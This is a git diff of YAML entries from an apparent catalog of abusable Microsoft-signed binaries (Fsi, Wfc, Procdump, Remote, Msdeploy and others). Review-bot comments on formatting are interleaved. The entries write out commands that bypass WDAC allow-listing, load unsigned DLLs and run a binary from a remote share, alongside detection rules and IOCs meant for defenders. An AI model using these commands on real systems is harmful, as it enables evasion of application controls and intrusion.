@@ -1,39 +1,38 @@ ---- -Name: Fsi.exe -Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsi.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsi.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe - - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Fsi.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://twitter.com/NickTyrer/status/904273264385589248 - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: Fsi.exe 
+Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: Fsi.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' 
diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml
index 54e1cf5..0a81660 100644
--- a/yml/OtherMSBinaries/FsiAnyCpu.yml
+++ b/yml/OtherMSBinaries/FsiAnyCpu.yml
@@ -1,35 +1,34 @@ ---- -Name: FsiAnyCpu.exe -Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsianycpu.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsianycpu.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. 
+Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 6a98a92..93c0440 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -31,4 +31,3 @@ Resources: Acknowledgement: - Person: fabrizio Handle: '@0rbz_' ---- diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index 234878a..eefd3ab 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml 
@@ -14,7 +14,7 @@ Commands: - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows server @@ -30,4 +30,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index 1fae912..b7a2cb3 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -33,7 +33,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: @@ -47,4 +47,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml index dc6bfe4..d9db99f 100644 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Sean Metcalf Handle: '@PyroTek3' ---- diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml index 2e72a56..28baf81 100644 --- a/yml/OtherMSBinaries/Powerpnt.yml +++ b/yml/OtherMSBinaries/Powerpnt.yml @@ -35,4 +35,3 @@ Resources: Acknowledgement: - Person: Reegun J (OCBC Bank) Handle: '@reegun21' ---- diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 65cbb04..7e8d513 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml 
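Review bot: `- Path: no default` gives the empty Full_Path entry a string, but two lines below `- Code:` in Code_Sample is still a bare key and parses as null, so a validator that types these fields as str would accept Path and reject Code; the Rcsi, Te and Tracker hunks carry the identical pair, and the rewritten CL_LoadAssembly, UtilityFunctions and VisualUiaVerifyNative files also keep `- Code:` bare. The empty `Handle:` values left in the comsvcs, Coregen and VSIISExeLauncher context, and the last Acknowledgement entry in Update.yml that has no Handle key at all, are in the same situation. Picking one explicit sentinel for "not applicable" and using it everywhere, e.g. `- Code: no default` or `- Code: ''`, keeps null from silently passing through whatever consumes these files.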
@@ -1,34 +1,35 @@ ---- -Name: Procdump(64).exe -Description: SysInternals Memory Dump Tool -Author: 'Alfie Champion (@ajpc500)' -Created: '2020-10-14' -Commands: - - Command: procdump.exe -md calc.dll explorer.exe - Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. - - Command: procdump.exe -md calc.dll foobar - Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Process creation with given '-md' parameter - - IOC: Anomalous child processes of procdump - - IOC: Unsigned DLL load via procdump.exe or procdump64.exe -Resources: - - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 -Acknowledgement: - - Name: Alfie Champion - Handle: '@ajpc500' ---- +--- +Name: Procdump(64).exe +Description: SysInternals Memory Dump Tool +Author: 'Alfie Champion (@ajpc500)' +Created: '2020-10-14' +Commands: + - Command: procdump.exe -md calc.dll 
explorer.exe + Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. + - Command: procdump.exe -md calc.dll foobar + Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. +Full_Path: + - Path: no default +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml + - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml + - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml + - IOC: Process creation with given '-md' parameter + - IOC: Anomalous child processes of procdump + - IOC: Unsigned DLL load via procdump.exe or procdump64.exe +Resources: + - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 +Acknowledgement: + - Person: Alfie Champion + Handle: '@ajpc500' diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 37af40f..0ef6457 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: 
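Review bot: `Created: '2020-10-14'` is re-added single-quoted, so it loads as a string, while every other entry in this diff writes the date bare (`Created: 2018-05-25`, `Created: 2021-09-26`) and loads as a date under YAML 1.1 parsers such as PyYAML; anything that types the Created field will treat Procdump differently from the rest of the catalog. Either form is defensible, but it should be one form across the files — given the bare form is the majority here, `Created: 2020-10-14` is the smaller change (the quoted Author value is harmless, since it is a string either way).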
@@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 73931d7..cb0d65d 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -10,21 +10,21 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe @@ -37,4 +37,3 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index f851b49..accc4b1 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Luis Rocha Handle: '@countuponsec' ---- diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index 235cbf4..64f3c43 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -33,4 +33,3 @@ Acknowledgement: Handle: '@bryon_' - Person: Manny Handle: '@ManuelBerrueta' ---- diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 492d0d4..58c2f90 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml 
@@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index a663d7c..0520437 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -55,4 +55,3 @@ Acknowledgement: Handle: '@reegun21' - Person: Adam Handle: '@Hexacorn' ---- diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 6059749..ec3001d 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Giuseppe N3mes1s Handle: '@gN3mes1s' ---- diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index 6657aeb..2cfb356 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: @@ -30,4 +30,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subTee' ---- diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 7143975..84822c3 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -119,4 +119,3 @@ Acknowledgement: - Person: Adam Handle: '@Hexacorn' - Person: Jesus Galvez ---- diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 3b5d330..95eb07f 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: timwhite Handle: ---- diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index a32369a..b2d3380 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml 
+++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml 
@@ -1,31 +1,30 @@ ---- -Name: VisualUiaVerifyNative.exe -Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: VisualUiaVerifyNative.exe - Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe -Code_Sample: - - Code: -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ - - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad -Acknowledgement: - - Person: Lee Christensen - Handle: '@tifkin' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. 
+ Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index a1eb7c8..29cbb5e 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 13e6a11..b9de32f 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml 
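Review bot: The Description re-added at the top of this hunk reads `save to - C:\Users\[current user]\AppData\Roaminguiverify.config`, where `Roaminguiverify.config` looks like a lost path separator before the file name and the stray ` - ` looks like a leftover from an earlier line wrap; the hunk re-adds both verbatim. If the intended location is the per-user Roaming folder the value should read `AppData\Roaming\uiverify.config` — confirm against the linked bohops write-up before changing it, since Description is the text defenders will search for.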
@@ -1,28 +1,27 @@
----
-Name: Wfc.exe
-Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
-Author: Jimmy (@bohops)
-Created: 2021-09-26
-Commands:
- - Command: wfc.exe c:\path\to\test.xoml
- Description: Execute arbitrary C# code embedded in a XOML file.
- Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
- Category: AWL Bypass
- Privileges: User
- MitreID: T1127
- OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
-Full_Path:
- - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
-Code_Sample:
- - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
-Detection:
- - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- - IOC: As a Windows SDK binary, execution on a system may be suspicious
-Resources:
- - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
-Acknowledgement:
- - Person: Matt Graeber
- Handle: '@mattifestation'
- - Person: Jimmy
- Handle: '@bohops'
----
+---
+Name: Wfc.exe
+Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
+Author: Jimmy (@bohops)
+Created: 2021-09-26
+Commands:
+ - Command: wfc.exe c:\path\to\test.xoml
+ Description: Execute arbitrary C# code embedded in a XOML file.
+ Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
+ Category: AWL Bypass
+ Privileges: User
+ MitreID: T1127
+ OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+Full_Path:
+ - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
+Code_Sample:
+ - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
+Detection:
+ - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+ - IOC: As a Windows SDK binary, execution on a system may be suspicious
+Resources:
+ - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
+Acknowledgement:
+ - Person: Matt Graeber
+ Handle: '@mattifestation'
+ - Person: Jimmy
+ Handle: '@bohops'
diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml
index 2453029..11bc887 100644
--- a/yml/OtherMSBinaries/Winword.yml
+++ b/yml/OtherMSBinaries/Winword.yml
@@ -38,4 +38,3 @@ Resources:
 Acknowledgement:
 - Person: 'Reegun J (OCBC Bank)'
 Handle: '@reegun21'
----
diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml
index 6884dfc..ab97c09 100644
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -49,4 +49,3 @@ Acknowledgement:
 Handle: '@NotoriousRebel1'
 - Person: Asif Matadar
 Handle: '@d1r4c'
----
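Review bot: The `IOC` on the new side of the Wfc.yml hunk (`As a Windows SDK binary, execution on a system may be suspicious`) is generic, while the `Command` line already gives the concrete cue: `wfc.exe` being handed a `.xoml` file on a host that is not a developer or build machine. Stating that in the entry, e.g. `- IOC: wfc.exe invoked with a .xoml file as an argument outside of a build or SDK context`, gives detection engineers something they can actually alert on rather than "an SDK binary ran". `Created: 2021-09-26` is an unquoted timestamp-looking scalar that most loaders turn into a date object rather than a string; that is fine if the schema expects a date, but if it expects a string it should be `Created: '2021-09-26'`, and the same applies to the VisualUiaVerifyNative.yml hunk.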
